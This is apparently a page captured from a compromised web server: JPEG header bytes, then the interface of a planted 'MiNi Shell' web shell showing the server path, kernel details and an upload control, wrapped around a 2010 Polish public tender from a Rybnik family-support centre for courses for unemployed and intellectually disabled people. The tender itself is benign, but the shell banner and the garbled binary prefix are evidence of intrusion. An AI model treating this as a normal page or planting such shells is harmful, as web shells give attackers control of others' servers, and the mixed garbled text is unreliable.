JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100510/115657-N-2010.html

<p class="kh_header"><b>Rybnik: Szkolenia dla osób bezrobotnych i niepełnosprawnych intelektualnie - w ramach projektu Jesteśmy potrzebni-działajmy razem</b><br>
<b>Numer ogłoszenia: 115657 - 2010; data zamieszczenia: 10.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. 3 Maja 31, 44-200 Rybnik, woj. śląskie, tel. 032 4260033, faks 032 4260033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.rybnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia dla osób bezrobotnych i niepełnosprawnych intelektualnie - w ramach projektu Jesteśmy potrzebni-działajmy razem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie szkoleń dla osób bezrobotnych 
i niepełnosprawnych intelektualnie z terenu powiatu rybnickiego realizowanych w ramach projektu Jesteśmy potrzebni - działajmy razem, współfinansowanego z Europejskiego Funduszu Społecznego w ramach priorytetu VII Promocja integracji społecznej,  Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.2 Rozwój 
i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Programu Operacyjnego Kapitał Ludzki. 
Zamówienie jest podzielone na 3 części:
Część 1 - Kurs pt. Prawo jazdy kategorii B 
Część 2 - Kurs pt. Ogrodnik-florysta
Część 3 - Kurs pt. Obsługa komputera oraz kasy fiskalnej

Szkolenia z części 2 i 3  muszą być organizowane w formie kursu realizowanego według programu nauczania obejmującego przeciętnie nie mniej niż 30 godzin lekcyjnych                           w tygodniu, wliczając w to przerwy.

Wykonawca dla każdej z części winien opracować program szkolenia, który powinien zawierać w szczególności:
a)	nazwę i zakres szkolenia,
b)	czas trwania i sposób organizacji szkolenia,
c)	wymagania wstępne dla uczestników szkolenia,
d)	cele szkolenia,
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
z uwzględnieniem, w miarę potrzeby części teoretycznej i części praktycznej,
f)	treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g)	sposób sprawdzania efektów szkolenia (egzamin).

Każde szkolenie powinno zawierać również dodatkowy, trwający osiem godzin zegarowych - wliczonych do programu szkolenia -moduł pierwszej pomocy przedmedycznej, którego zakres tematyczny obejmuje:
a)	zabezpieczenie poszkodowanego przed czynnikami zagrażającymi jego życiu;
b)	postępowanie w przypadku zranienia, oparzenia, urazu głowy, kręgosłupa, utraty przytomności, na wypadek zatrucia substancjami chemicznymi, porażenia prądem;
c)	podstawy reanimacji (resuscytacji): zewnętrzny masaż serca, sztuczne oddychanie -ćwiczenia na fantomie;
d)	posługiwanie się podręcznymi środkami technicznymi - ćwiczenia;
e)	podstawowe wyposażenie apteczki pierwszej pomocy.


Część 1 - pn.  Kurs pt.  Prawo jazdy kategorii B  - 14 osób.

Prawo jazdy kategorii B (+badania  przez organizatora+ egzamin praktyczny                                                   i teoretyczny+ egzamin w Rybniku)
W związku z realizacją szkolenia pt.  Prawo jazdy kat. B , należy uwzględnić następujące wymagania dotyczące ww. szkolenia. Uczestnicy kursu powinni otrzymać pełen zestaw materiałów pomocniczych niezbędnych do prawidłowego przebiegu szkolenia                               i przygotowania do egzaminu końcowego. Koszty ww. materiałów winny być elementem kalkulacji kosztów szkolenia, a ich cena nie powinna przekroczyć ogólnie przyjętych w tym zakresie standardów. 
I. Program szkolenia: zgodny z rozporządzeniem Ministra Infrastruktury w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów z dnia 27 październik 2005 roku (Dz. U. Nr 217 poz. 1834              z dnia 31 października 2005 z późn. zm.).
II. Dokumenty potwierdzające ukończenie szkolenia : Zaświadczenie o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kategorii B, Certyfikat z informacją                  o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego .



Część 2 -Kurs pt. Ogrodnik- florysta - 18 osób

W zawiązku z realizacją szkolenia pt. Ogrodnik - florysta, należy uwzględnić następujące wymagania dotyczące ww. szkolenia. Uczestnicy szkolenia powinni otrzymać pełen zestaw 
materiałów pomocniczych niezbędnych do prawidłowego przebiegu szkolenia                                   i  przygotowania do egzaminu końcowego. Koszty wszystkich materiałów niezbędnych do
realizacji szkolenia winny być elementem kalkulacji szkolenia, a ich cena nie powinna przekroczyć ogólnie przyjętych w tym zakresie standardów. 

Zajęcia teoretyczne i praktyczne odbywać się będą w Warsztatach Terapii Zajęciowej            w Czerwionce - Leszczynach, ul. 3 Maja 21a. Uczestnikami będą  osoby niepełnosprawne intelektualnie.

I. Program szkolenia: powinien wynosić 120 godzin i obejmować co najmniej następujące zagadnienia:
1.	Wiadomości ogólne o uprawie gleby i nawożeniu roślin
2.	Elementy urządzania terenów zielonych
3.	Wiadomości z zakresu BHP
4.	Zakładanie i pielęgnacja trawników i  rabat 
5.	Sadzenie i pielęgnacja drzew i krzewów
6.	Asortyment roślin ozdobnych 
7.	Sposoby utrwalania materiału roślinnego 
8.	Narzędzia i środki techniczne 
9.	Artykuły dekoracyjne 
10.	Style w kompozycjach 
11.	Podstawowe zasady wykonywania kompozycji 
12.	Wiązanki okolicznościowe 
13.	Kompozycje w naczyniach 
14.	Florystyka ślubna 
15.	Florystyka żałobna 
16.	Dekoracje okolicznościowe 
17.	Dekoracje z roślin doniczkowych 
18.	Kompozycje z roślin suchych, sztucznych, i preparowanych 

UWAGA !!!
Powyższe zagadnienia mogą być w planie nauczania rozwinięte, lecz dodanie innych zagadnień lub pominięcie któregoś z powyższych skutkować będzie odrzuceniem oferty.

II. Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji:
Zaświadczenie o ukończeniu szkolenia, Certyfikat z informacją o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego.

Część 3 -Kurs pt. Obsługa komputera oraz kasy fiskalnej - 8 osób.
Każdy uczestnik szkolenia musi mieć do dyspozycji własne stanowisko komputerowe                        z wymaganym oprogramowaniem. Zajęcia praktyczne i teoretyczne odbywały się będą                 w miejscu wyznaczonym przez Wykonawcę.  
I Program szkolenia : powinien wynosić 120 godzin ( w tym conajmniej 20 godzin praktycznych ) i obejmować co najmniej następujące zagadnienia:
1.	Podstawy obsługi komputera w systemie Windows 
1.	Wprowadzenie do Windows - interfejs systemu 
2.	Przystosowanie Windows do pracy 
3.	Mój komputer - zarządzanie zasobami na dyskach 
4.	Zapisywanie dokumentów 
5.	Polecenia Zapisz i Zapisz jako 
6.	Prawidłowe nawyki zapisywania dokumentów 
2.	Komputerowa edycja tekstów 
1.	Budowa okna programu 
2.	Zasady poprawnej edycji dokumentu 
3.	Formatowanie dokumentu 
4.	Drukowanie dokumentu 
3.	Projektowanie obliczeń w arkuszu kalkulacyjnym 
1.	Podstawowe pojęcia 
2.	Prowadzenie obliczeń 
3.	Graficzna prezentacja wyników 
4.	Drukowanie arkuszy i wykresów - opcje drukowania 
5.	Baza danych 
6.	Korzystanie z pomocy programu 
4.	Internet i poczta elektroniczna 
1.	Obsługa poczty elektronicznej. 
2.	Obsługa przeglądarki WWW 
3.	Wyszukiwanie informacji w internecie 
5.	Obsługa kas fiskalnych
1.	Podstawowe akty prawne związane ze stosowaniem kas fiskalnych
2.	Budowa, zasady działania oraz podział urządzeń fiskalnych
3.	Przygotowanie kasy do pracy
4.	Sprzedaż, zwrot opakowań, wykonywanie raportów
5.	Współpraca kas z urządzeniami dodatkowymi: czytnikiem kodów, komputerem itp.
 6.     Fakturowanie - obsługa programu Subiekt.

UWAGA !!!
Powyższe zagadnienia mogą być w planie nauczania rozwinięte, lecz dodanie innych
zagadnień lub pominięcie któregoś z powyższych skutkować będzie odrzuceniem oferty.
II. Dokumenty potwierdzające ukończenie szkolenia i uzyskania kwalifikacji:
Zaświadczenie o ukończeniu szkolenia, Certyfikat z informacją
o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy z dnia 29.01.2004 r.  Prawo zamówień publicznych, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy z dnia 29.01.2004 r.  Prawo zamówień publicznych, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy z dnia 29.01.2004 r.  Prawo zamówień publicznych, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy z dnia 29.01.2004 r.  Prawo zamówień publicznych, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy z dnia 29.01.2004 r.  Prawo zamówień publicznych, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pcpr.rybnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. 3 Maja 31, 44-200 Rybnik, pok. 01.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2010 godzina 08:30, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. 3 Maja 31, 44-200 Rybnik, pok. 01.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest realizowane w ramach projektu Jesteśmy potrzebni - działajmy razem, współfinansowanego z Europejskiego Funduszu Społecznego w ramach priorytetu VII Promocja integracji społecznej,  Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.2 Rozwój 
i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com